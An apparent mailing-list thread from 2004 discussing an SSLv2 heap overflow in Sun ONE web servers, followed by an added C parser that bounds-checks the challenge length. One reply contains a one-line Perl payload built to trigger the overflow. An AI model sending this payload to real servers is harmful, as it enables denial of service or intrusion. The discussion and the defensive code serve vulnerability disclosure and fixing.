Dailydave mailing list archives
Re: new ssl bug in Sun web servers
From: H D Moore <hdm-daily-dave () digitaloffense net>
Date: Mon, 23 Aug 2004 18:45:01 -0500
Heap smashing fun on SunOne 6.1 (Win32). What non-Sun applications use the NSS library for the server side? Sans the "server" and "selfserve" apps that come with NSS, I wasn't able to find much that used this part of it.

For the impatient/lazy:

    my $hello_goodbye = "\x84\x0c\x01\x00\x02\x00\x03\x00\x00\x04\x00\x07\x00\xc0". ("X" x 1024);

-HD

On Monday 23 August 2004 17:07, Evgeny Demidov wrote:
> On Mon, 23 Aug 2004 16:27:38 -0400 Dave Aitel <dave () immunitysec com> wrote:
>> http://xforce.iss.net/xforce/alerts/id/180
>> Author: Mark Dowd
>> Bug in: SSLv2 handshake of Netscape Enterprise Server (and other related products)
>> Type: Remote heap overflow.
>>
>> Go Mark! :>
>
> Hmm, this nice bug which really looks like a backdoor for me has been found during 10 minute NSS audit and given to VD about month ago ;-)
>
> sslconn.c:
>     /* Squirrel away the challenge for later */
>     PORT_Memcpy(ss->sec.ci.clientChallenge, challenge, challengeLen);
>
> Best regards
> -Evgeny Demidov
> _______________________________________________
> Dailydave mailing list
> Dailydave () lists immunitysec com
> http://www.immunitysec.com/mailman/listinfo/dailydave
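
Added example, not part of the original thread and not NSS code: a minimal C parser for the SSLv2 CLIENT-HELLO layout used in the message above, which rejects any record whose challenge length falls outside the 16 to 32 bytes the SSLv2 specification allows before copying into a fixed-size buffer. The struct, function and constant names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Bounds from the SSLv2 specification: CHALLENGE-LENGTH must be 16..32. */
#define MIN_CHALLENGE 16
#define MAX_CHALLENGE 32

/* Hypothetical stand-in for per-connection state; not the NSS structure. */
struct conn_info {
    uint8_t client_challenge[MAX_CHALLENGE];
    size_t  challenge_len;
};

static unsigned be16(const uint8_t *p) { return ((unsigned)p[0] << 8) | p[1]; }

/* Parse one SSLv2 CLIENT-HELLO record with a 2-byte header and store the
 * challenge. Returns 0 on success, -1 if any length field is inconsistent. */
int parse_client_hello(struct conn_info *ci, const uint8_t *rec, size_t n)
{
    if (n < 11 || !(rec[0] & 0x80))        /* 2-byte header + 9 fixed bytes */
        return -1;
    size_t body = be16(rec) & 0x7fff;      /* top bit is the header-size flag */
    if (body != n - 2 || rec[2] != 0x01)   /* 0x01 = CLIENT-HELLO */
        return -1;

    size_t cipher_len = be16(rec + 5);
    size_t sid_len    = be16(rec + 7);
    size_t chal_len   = be16(rec + 9);

    /* Spec constraints: cipher specs are 3 bytes each, session id is 0 or 16. */
    if (cipher_len == 0 || cipher_len % 3 != 0)
        return -1;
    if (sid_len != 0 && sid_len != 16)
        return -1;
    /* The bound that must hold before the copy into the fixed-size buffer. */
    if (chal_len < MIN_CHALLENGE || chal_len > MAX_CHALLENGE)
        return -1;
    /* The three variable-length fields must exactly fill the record body. */
    if (9 + cipher_len + sid_len + chal_len != body)
        return -1;

    memcpy(ci->client_challenge, rec + 11 + cipher_len + sid_len, chal_len);
    ci->challenge_len = chal_len;
    return 0;
}
```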